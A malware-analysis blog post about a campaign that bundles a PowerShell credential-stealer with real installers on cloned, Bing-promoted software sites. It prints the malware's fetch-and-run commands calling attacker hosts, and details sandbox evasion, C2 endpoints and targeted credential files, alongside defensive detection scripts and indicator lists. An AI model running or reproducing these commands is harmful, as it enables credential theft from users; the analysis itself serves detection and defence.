
Analysis of a credential-stealer malware campaign – Part 1

May 20, 2026

Introduction

In March 2026, cirosec identified an active malware campaign targeting developers, IT professionals, and power users who rely on popular open-source and productivity tools such as Joplin, PuTTY, WinSCP, KeePass, FileZilla, 7-Zip, and, more recently, Gemini CLI. The attackers cloned the official websites of these products, manipulated Bing search rankings to place their malicious copies above the legitimate results, and bundled a credential-stealer with genuine software installers. Because the real application is installed along with the malware, victims have little reason to suspect that anything went wrong.

The campaign is notable for both its extent and its evasion techniques. We identified over 25 attacker-controlled domains that impersonate at least 12 different software products. These domains were registered in distinct waves, beginning in late March 2026 and continuing as of mid-April. Strict referrer checking ensures that only visitors arriving from Bing see the malicious content – visitors accessing the site directly and automated scanners receive a 404 response, which has likely contributed to the campaign remaining largely undetected by search engine abuse filters.

Once executed, the malware exfiltrates browser credential stores, cryptocurrency wallet data, authentication tokens, VPN and SSH configurations, and sensitive documents. Afterwards, it awaits further instructions from its command and control server, for example to download and execute arbitrary code. During our investigation, the campaign evolved from a straightforward infostealer into a multi-staged malware with persistence mechanisms, remote code execution, and a custom Chrome browser extension, which will be examined in part two of this series.

This first part covers the infection path from search engine to payload delivery, the attacker infrastructure behind it, and a detailed analysis of the PowerShell-based stealer, including its encryption scheme, sandbox evasion, and data exfiltration routines.

Infection path

Search results on Bing









The example examined in this blog post is a malicious website disguised as the official website of the Joplin app (https://joplinapp.org/). When the Bing search engine is used to search for anything related to this program, the malicious site (https[:]//joplinapp[.]co[.]com) is frequently listed above the original download site or among the top results.







After clicking on the malicious Bing result for joplinapp[.]co[.]com, the user is redirected to one of the main malicious domains (e.g. joplin-desktop[.]app, see Figure 3) with a request to the /check?t=<hash> endpoint, which carries a random, hash-like URL parameter “t”. If the server accepts the request, the response includes a hidden form along with some JavaScript that triggers a POST request to that same URL.

The POST request returns an HTML document that impersonates the original webpage. Across all domains we tested, the only body parameter submitted was reader=yes. We suspect that this parameter, together with the user-agent header, determines whether the server responds with a legitimate download link or delivers the malware payload.

The whole communication chain from the user clicking on the Bing result until arriving on the phishing domain looks like this:

When viewed in the browser, the fake site is almost indistinguishable from the original; the only noticeable difference is the missing language selection in the menu bar at the top.

Because of the chain of referrer checks and the final POST request, most scanners will simply stop at the “Not Found” page, which further preserves the campaign’s stealth.

During our research, we were unable to find any search engine other than Bing that was an accepted referrer.
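To make the gating behavior easier to reason about, the following Python sketch models what a visitor would plausibly see at each step. It is a simplified model based only on the observations described above, not the attacker's actual server logic; the function name `gate_response` and the exact host check are assumptions made for illustration.

```python
from typing import Optional
from urllib.parse import urlparse


def gate_response(method: str, referer: Optional[str], body: Optional[dict] = None) -> int:
    """Return the HTTP status a visitor would plausibly receive (simplified model)."""
    if method == "GET":
        host = urlparse(referer or "").hostname or ""
        # Observed: only visitors arriving from Bing pass the referrer check.
        if host == "bing.com" or host.endswith(".bing.com"):
            return 200  # hidden form plus JavaScript that re-submits via POST
        return 404      # direct visits and most scanners end up here
    # Observed: the only body parameter submitted was reader=yes.
    if method == "POST" and (body or {}).get("reader") == "yes":
        return 200      # cloned product page
    return 404


if __name__ == "__main__":
    print(gate_response("GET", "https://www.bing.com/search?q=joplin"))
    print(gate_response("GET", None))
    print(gate_response("POST", None, {"reader": "yes"}))
```

A scanner that requests the URL without a Bing referrer, or that never performs the follow-up POST, only ever sees the 404 branch in this model.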

Malicious installer

Once the malicious page is loaded, a click on the download button downloads a malicious installer (Joplin-Setup.exe). The executable is signed with a certificate issued to the company “Shenzhen Xingzhongxing Electronic Technology Co., Ltd.”; this certificate has since been revoked.



When the installer is executed, the original Joplin software is installed on the user’s device to give the impression that everything worked as intended. At the same time, the malicious PowerShell script is downloaded and executed in the background; this is discussed in detail in the chapter on malware analysis. The analysis of the executable file on the VirusTotal platform shows the following details:

iex(irm events[.]ms709[.]com)

Malicious CLI command



The newer version of the malware, which we will cover in part two of this blog post series, uses a more sophisticated impersonation attempt, shown below for the Gemini CLI on geminicli[.]co[.]com.



In this case, just as on Gemini CLI’s original website, the malicious website offers a PowerShell command to install the application; however, this command (as shown below) differs from the legitimate one.

powershell -c "irm use-gemini[.]com/install.ps1 | iex"

The user is lured into copying and running this command on their machine, which installs the following npm package in the background:

npm install -g @google/gemini-cli

The malicious website bases its decision on whether to show the legitimate or the malicious command on the user-agent. In the next step, the endpoint delivering the install.ps1 script checks for the user-agent again and decides if the downloaded PowerShell file should include the final malicious install commands (or only the legitimate npm install).

According to our research, the endpoint only returns the malicious command if the user-agent header includes “WindowsPowerShell”, a check that presumably serves to avoid automated detection.

Since the malware variant distributed through this specific infection chain is more complex, but also similar to the variant distributed via the Joplin installer, we will investigate this variant further in a second part of the blog post.

Attacker infrastructure

The attacker hosts multiple malicious websites on the servers 5.8.18[.]129 and 5.8.18[.]88 and, more recently, on 109.107.170[.]57. Each of them impersonates the legitimate website of a company or product (such as 7-Zip, Cyberduck, EmEditor, FileZilla, ShareX, Joplin, KeePass, Mullvad VPN, PuTTY, S3 Browser, and WinSCP). Most domains we observed were registered on March 26, 2026 and April 3, 2026, with another wave starting on April 14.

The domain names are designed to be mistaken for the originals, using typographical variations or names that merely look legitimate (e.g. joplin-desktop instead of joplinapp). The second-level domains *.co.com and *.us.com are used by the attacker as entry points for the campaign on Bing. These entry-point domains redirect to newly registered domains such as joplin-desktop[.]app.

We suspect that the co.com domains are used in this campaign because, as second-level domains (SLDs), they lack a proper WHOIS entry. This likely causes Bing to treat them as subdomains of the long-established co.com domain rather than freshly registered ones, ranking them higher in search results.

Both the .exe installer and the .ps1 script ultimately download the malware by contacting the command and control (C2) server (in this example events[.]ms709[.]com) using irm and then invoking the script via iex.
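For defenders, this download-and-execute pattern can be searched for in process command lines or PowerShell logs. The following Python sketch flags the two forms seen in this post, `iex(irm …)` and `irm … | iex`. The long cmdlet names and the `iwr`/`Invoke-WebRequest` variants are additions for illustration and were not observed in this campaign; the function name is hypothetical, and a regular expression like this can be bypassed by further obfuscation.

```python
import re

# PowerShell download cmdlets/aliases and the expression-evaluation cmdlet/alias.
_FETCH = r"(?:irm|invoke-restmethod|iwr|invoke-webrequest)"
_EXEC = r"(?:iex|invoke-expression)"

DOWNLOAD_EXEC = re.compile(
    rf"\b{_EXEC}\s*\(\s*{_FETCH}\b[^)]*\)"   # form 1: iex(irm <url>)
    rf"|\b{_FETCH}\b[^|]*\|\s*{_EXEC}\b",     # form 2: irm <url> | iex
    re.IGNORECASE,
)


def is_download_and_execute(command_line: str) -> bool:
    """Return True if the command line fetches remote content and evaluates it."""
    return DOWNLOAD_EXEC.search(command_line) is not None


if __name__ == "__main__":
    samples = [
        "iex(irm events[.]ms709[.]com)",
        'powershell -c "irm use-gemini[.]com/install.ps1 | iex"',
        "npm install -g @google/gemini-cli",
    ]
    for sample in samples:
        print(is_download_and_execute(sample), sample)
```

Because legitimate installers also use this idiom, a match is a reason to inspect the contacted host rather than proof of compromise.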



The C2 server provides the malware sample. We observed multiple domains serving the malware: events[.]ms709[.]com, metrics[.]msft17[.]com and events[.]msft23[.]com. All of these domains were hosted on the same IP addresses: 93.152.217[.]97, 104.21.87[.]46 and 45.150.66[.]3. Over time, Cloudflare was added as a reverse proxy in front of some of the hosts.

One of the IP addresses exposed Swagger documentation of the API used by the malware to communicate with the servers:

All URLs found to be part of the campaign are listed in the IoCs chapter at the end of this post.

Malware analysis

The downloaded executable extracts and runs a PowerShell file that acts as the malicious component. To give the user a false sense of security, the original application is installed while the PowerShell script continues running in the background. The same applies to the copied malicious CLI commands.



The ms709[.]com server mentioned above provides a uniquely obfuscated script each time it is contacted. The obfuscation relies mostly on added garbage code and string substitution, which, as a side effect, inflates the script to more than ten times its unobfuscated size. The use of these techniques varies between downloads. Unfortunately, this also means that hash-based detection of the script is not possible.

Using a custom PowerShell deobfuscator, it was possible to get rid of the redundant statements and make the code more human-readable.

The PowerShell malware is primarily concerned with stealing information, not with persistence. In effect, it uses three endpoints to exfiltrate information and retrieve further instructions:

- /take: Initial recon, system info and client RSA pub key exfiltration

- /validate: Heartbeats and logs

- /process: Main upload of exfiltrated data



Alongside obfuscation, the script also performs sandbox detection. If matching files, hashes or lengths are found, the program will exit immediately. For our analysis we deactivated these checks before uploading the script to Any.Run (https://app.any.run/tasks/1c034401-1238-4eca-a18d-e353c8300c06).

Some of the checks are:

- compare the SHA-256 hash of the background image located at %AppData%\Microsoft\Windows\Themes\TranscodedWallpaper with the hash of a wallpaper commonly used in sandboxes

- check for the presence of the files “пароли.txt” (Russian for “passwords”) and “new songs.txt”

- check whether fewer than 10 processes are currently running

- check whether QEMU is used for virtualization

After ensuring that the script is not running in a sandbox, the script tries to detect the victim’s country by checking for the “OSLanguage” value and decides whether to continue with the attack.

Countries excluded from attacks are:

AZ – Azerbaijan; AM – Armenia; BY – Belarus; GE – Georgia; KZ – Kazakhstan; KG – Kyrgyzstan; MD – Moldova; RU – Russia; TJ – Tajikistan; TM – Turkmenistan; UZ – Uzbekistan; UA – Ukraine; IR – Iran

Traffic encryption / obfuscation

The script contains two hard-coded RSA keys (key A and key B). Key A is used for outgoing messages and key B for verifying incoming messages. Furthermore, a unique RSA key pair (key C) is generated at runtime and used to sign outgoing messages and decrypt incoming messages.

Every communication with the external C2 server follows a specific format in which the payload is encrypted with AES and signed with the private key of key pair (C). For each message, a new AES key is generated locally, encrypted with the RSA public key (A), and embedded in the message body. The data is sent in the body of the request using the following JSON format:

{ |

Responses from the server follow the same schema, and the client runs the same routine in reverse to obtain usable data. First, the received AES key is decrypted using the private key of key pair (C). The encoded data is then decrypted using the AES key and verified using one of the hard-coded keys (B).

The public key of key pair (C) is sent to the server in the first request to the /take endpoint, while the private key is stored in the “MachineKeyStore”.

Execution order

The machine GUID identifies the victim to the server and is included as a URL parameter in every request to the C2 server. Unlike server-side values, the GUID does not need to be pre-registered: the C2 server accepts any UUID on first contact. However, once a UUID/GUID has contacted the /take endpoint and received a response, further requests to this endpoint with the same UUID no longer receive an answer.

After performing the initial checks (sandbox detection and region detection), the C2 server is contacted in the following pattern:

POST /take/XYaR5gFi/{MachineGuid}

This first POST request will exfiltrate basic metadata about the system and receive an instruction set of further tasks.

If more detailed logging is activated using a specific task from the previous response, further metadata and logging information is posted to the C2 server.

POST /validate/XYaR5gFi/{MachineGuid}

Depending on the task ID, further POST requests to /validate may occur. They exfiltrate data such as screenshots or specific files. During the data collection process, data is continuously exfiltrated to the /process endpoint:

/process/XYaR5gFi/{MachineGuid}



Once a /process POST request terminates with “END”, the response may again contain a subset of further commands to execute in the form of further tasks.
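The request pattern described in this section lends itself to a simple search over proxy or web gateway logs. The Python sketch below matches URL paths of the form /take, /validate, or /process followed by an alphanumeric segment and a GUID. The meaning of the middle segment (XYaR5gFi in our sample) is not known to us, so the group name `token` is only a label; the function name and the assumption that the MachineGuid appears in the usual hyphenated form are likewise illustrative.

```python
import re
from typing import Dict, Optional

C2_PATH = re.compile(
    r"^/(?P<endpoint>take|validate|process)"
    r"/(?P<token>[A-Za-z0-9]+)"  # e.g. XYaR5gFi; purpose unknown
    r"/(?P<guid>[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12})/?$"
)


def match_c2_path(path: str) -> Optional[Dict[str, str]]:
    """Return the endpoint, token, and GUID if the path fits the observed pattern."""
    match = C2_PATH.match(path)
    return match.groupdict() if match else None


if __name__ == "__main__":
    print(match_c2_path("/take/XYaR5gFi/12345678-1234-1234-1234-123456789abc"))
    print(match_c2_path("/index.html"))
```

Matching on the path structure rather than on the host name keeps the check useful when the attacker rotates C2 domains.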

Data collection

The script can collect a large volume of data during its execution.

Two memory streams are allocated globally for this purpose. One stream collects metadata and the other collects the actual data from files. The data collected during enumeration is chunked and exfiltrated to the /process endpoint once the maximum chunk size (60 Mb) is reached. The memory stream stores the actual data from the requested files together with their metadata in the following format:

… | (4 Bytes), Path-Length (4 Bytes), Path (N Bytes), File Data (N Bytes) | … |
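Analysts who recover such a stream (for example from memory or after decryption) may want to split it back into files. The Python sketch below does this under several assumptions that are not confirmed by the layout above: the first, unnamed 4-byte field is taken to be the length of the file data, both length fields are read as little-endian unsigned 32-bit integers, and the path is decoded as UTF-8. The function name `iter_records` is hypothetical.

```python
import struct
from typing import Iterator, Tuple


def iter_records(blob: bytes) -> Iterator[Tuple[str, bytes]]:
    """Yield (path, file_data) pairs from a concatenated record stream."""
    offset = 0
    while offset < len(blob):
        # ASSUMPTION: first field = file data length, second = path length,
        # both little-endian uint32. The first field is not named in the source.
        data_len, path_len = struct.unpack_from("<II", blob, offset)
        offset += 8

        path_bytes = blob[offset:offset + path_len]
        if len(path_bytes) != path_len:
            raise ValueError("truncated path")
        offset += path_len

        data = blob[offset:offset + data_len]
        if len(data) != data_len:
            raise ValueError("truncated file data")
        offset += data_len

        # ASSUMPTION: paths are UTF-8; undecodable bytes are replaced.
        yield path_bytes.decode("utf-8", errors="replace"), data


if __name__ == "__main__":
    path = "C:\\Users\\test\\notes.txt".encode("utf-8")
    content = b"hello"
    sample = struct.pack("<II", len(content), len(path)) + path + content
    for record_path, record_data in iter_records(sample):
        print(record_path, len(record_data))
```

If the parsed lengths look implausible for a real capture, the field order or byte order assumed here is the first thing to revisit.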



Gather and exfiltrate basic user / machine data

After retrieving the machine’s identifier, the script contacts the endpoint events[.]ms709[.]com/take/<GUID>. The transmitted message contains basic system information in the form of a concatenated string. The following information is transmitted:

- <RSA Public Key from the generated key pair (C)>

- <OSVersion>.<ReleaseId> (<Productname>)

- <TotalPhysicalMemory>

- <%ENV%USERNAME>

- <%ENV%COMPUTERNAME>



In our observations, the server always returned an empty string in response to the first request, and the code contains a hard-coded exit condition for exactly this response. Taking other observations into account, this is probably because the campaign (and the C2 server) was not active at the time of testing, or because the server decided that this client was “uninteresting”:

If this condition is removed, the malware will repeat its request a second time, this time receiving a response from the server. While the response does not include direct instructions, it does specify what the malware should scan for.



The server can return multiple dynamic instructions per request by specifying a task identifier in the form of a unique number and relevant arguments passed to the task. The format is “<number>|<arg1>|<arg2>+;<number>|<arg1>|<arg2>+;”.
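When analyzing captured responses, it helps to split this instruction string into individual tasks. The following Python sketch does so, assuming that “;” terminates each task, “|” separates the task number from its arguments, and the “+” in the format description merely indicates that further arguments may follow. The function name `parse_tasks` and the sample payload are made up for illustration.

```python
from typing import List, Tuple


def parse_tasks(payload: str) -> List[Tuple[int, List[str]]]:
    """Split a task string into (task_id, arguments) tuples."""
    tasks = []
    for entry in payload.split(";"):
        entry = entry.strip()
        if not entry:
            continue  # skip the empty piece after the trailing ';'
        task_id, *args = entry.split("|")
        tasks.append((int(task_id), args))
    return tasks


if __name__ == "__main__":
    # Hypothetical payload in the described format.
    for task_id, args in parse_tasks("60|%userprofile%\\Documents|*.txt|*.rdp;22;"):
        print(task_id, args)
```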



For example, if the server wants the malware to look further into wallets present on the system, it sends the task IDs 22, 23, or 24 in the payload.

During our research, the task with ID “60” was frequently returned as an instruction. It is followed by a path such as %userprofile%\Documents and a list of file name patterns that the server wants to have a closer look at. These include *.txt, *.rdp, *.docx, *.xls, *.env, *2fa*, *.ed25519, *.vbox, *token*, *credit*, *bank* and *login*.
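To estimate which files in a given directory would be caught by these patterns, the list can be replayed with Python's `fnmatch` module. This is only an approximation: it assumes case-insensitive matching (as is usual on Windows) and that the malware's wildcard semantics behave like simple glob patterns. The function name `matching_patterns` is hypothetical.

```python
from fnmatch import fnmatchcase
from typing import List

# File name patterns observed together with task ID 60.
PATTERNS = [
    "*.txt", "*.rdp", "*.docx", "*.xls", "*.env", "*2fa*",
    "*.ed25519", "*.vbox", "*token*", "*credit*", "*bank*", "*login*",
]


def matching_patterns(file_name: str) -> List[str]:
    """Return all observed patterns that match the given file name."""
    name = file_name.lower()  # ASSUMPTION: matching is case-insensitive
    return [pattern for pattern in PATTERNS if fnmatchcase(name, pattern)]


if __name__ == "__main__":
    for candidate in ["Bank_Login.TXT", "server.rdp", "photo.jpg"]:
        print(candidate, matching_patterns(candidate))
```

Running this over a file listing of a user profile gives a rough impression of how much material a single task 60 instruction could sweep up.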



The full functionality of these codes is listed in the following table:



Upload small heartbeat to /validate endpoint

The request to the /validate endpoint primarily contains status, logging, and metadata information as well as error messages caught by the program (such as “PS Other arch invoke fail – $_.Exception.Message”). The script also announces which parts will be extracted in the next request to the /process endpoint.

The table below shows some strings that the malware will send to the /validate endpoint.

Data collection and exfiltration

During our tests, the /process endpoint received the largest data blobs from the compromised computer. The exfiltration scope combines hard-coded routines with dynamic configurations received from the /take endpoint.

Drive enumeration

By default, the malware enumerates several types of drives present on the victim’s machine:

- removable disks like USB drives (type 2),

- network drives (type 4) and

- compact discs (type 5),

while disregarding local disks (type 3).

The drive names are added to the metadata collection for the /validate endpoint. In addition to the drive names, the file names and the contents of the files from the aforementioned drive types with .docx and .txt file types are added to the /process memory stream for a later upload.
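The type numbers mentioned above correspond to the standard Windows drive type values. As a minimal sketch, the selection can be expressed as follows; the enum and function names are chosen for illustration and do not come from the malware.

```python
from enum import IntEnum


class DriveType(IntEnum):
    """Standard Windows drive type values."""
    UNKNOWN = 0
    NO_ROOT_DIRECTORY = 1
    REMOVABLE = 2
    FIXED = 3
    NETWORK = 4
    CDROM = 5
    RAM = 6


# Drive types the default enumeration covers; local disks (3) are skipped.
ENUMERATED_TYPES = {DriveType.REMOVABLE, DriveType.NETWORK, DriveType.CDROM}


def is_enumerated(drive_type: int) -> bool:
    """Return True if a drive of this type is covered by the default enumeration."""
    return drive_type in ENUMERATED_TYPES


if __name__ == "__main__":
    for drive_type in DriveType:
        print(drive_type.name, is_enumerated(drive_type))
```

In practical terms, mapped network shares and plugged-in USB drives are covered by default, whereas local disks are only reached through the hard-coded targets and the server-supplied paths.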

Hard-coded targets

Hard-coded targets include browser credential stores such as Firefox’s “key4.db” and Chrome’s Web Data SQLite databases, Windows credentials and DPAPI Keys that are enumerated through the “CredEnumerate” API as well as system reconnaissance data (process lists, OS version, hardware details).

The dynamic part consists of “path and pattern” pairs, exclude lists, and conditional parameters. If the task ID 100 is present in the server’s response, the more detailed exfiltration pipeline is activated.

Besides credential theft, the most critical part is the “path and pattern” pairs, which differ from system to system (or response to response) and therefore determine the actual risk posed by a compromise.

The server accepted these uploads and did not respond with any content. While this might simply be related to the Any.Run timeout of one minute, the PowerShell code does suggest that a response from the /process endpoint can be executed directly on the command line.

Indicators of compromise (IoCs)

C2 server URLs:

- events[.]ms709[.]com

- metrics[.]msft17[.]com

- events[.]msft23[.]com

- mo2307[.]com

C2 server IP addresses:

- 93.152.217[.]97

- 104.21.87[.]46

- 172.67.141[.]127

- 45.150.66[.]3

- 146.185.233[.]59

Malicious website host:

- 5.8.18[.]129

- 5.8.18[.]88

- 109.107.170[.]57

Malicious URLs of the campaign:

- 7zip-setup[.]us[.]com

- cyber-duck[.]co[.]com

- cyberduck[.]info

- cyberduck-download[.]org

- cyberduck-ftp[.]com

- em-editor[.]co[.]com

- emeditor-download[.]co[.]com

- filezilla-project[.]us[.]com

- getsharex-download[.]com

- getsharex-setup[.]com

- joplin-app[.]co[.]com

- joplin-desktop[.]app

- joplin-opensource[.]co[.]com

- keepass[.]us[.]com

- mullvad-download[.]it[.]com

- mullvad-download[.]org

- mullvad-vpn[.]us[.]org

- putty-setup[.]us[.]com

- s3-browser[.]quest

- s3-browser-download[.]blog

- winscp-app[.]org

- winscp-download[.]us[.]org

- winscp-downloads[.]com

- winscp-ftps[.]com

- winscp-setup[.]net

Malicious Joplin installer hash:

- 45ac2309f57da4f6c352877ebd7d46266be8db6a7167458b69219a2a5ba5c88a
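The indicators in this chapter are defanged. To load them into a blocklist or compare them against DNS and proxy logs, they first need to be converted back. The following Python sketch shows one way to do this and to check whether a host name equals a listed domain or is a subdomain of one; the function names are hypothetical.

```python
from typing import Iterable, Set


def refang(indicator: str) -> str:
    """Convert a defanged indicator such as 'events[.]ms709[.]com' back to normal form."""
    return indicator.strip().lower().replace("[.]", ".").replace("[:]", ":")


def build_blocklist(defanged: Iterable[str]) -> Set[str]:
    """Refang all indicators and collect them in a set."""
    return {refang(item) for item in defanged}


def is_listed(host: str, blocklist: Set[str]) -> bool:
    """Return True if the host equals a listed domain or is a subdomain of one."""
    host = host.strip().lower().rstrip(".")
    return any(host == entry or host.endswith("." + entry) for entry in blocklist)


if __name__ == "__main__":
    blocklist = build_blocklist(["events[.]ms709[.]com", "mo2307[.]com"])
    print(is_listed("events.ms709.com", blocklist))
    print(is_listed("joplinapp.org", blocklist))
```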

Author: Colin Glätzer, Konrad Weyhing, Felix Friedberger
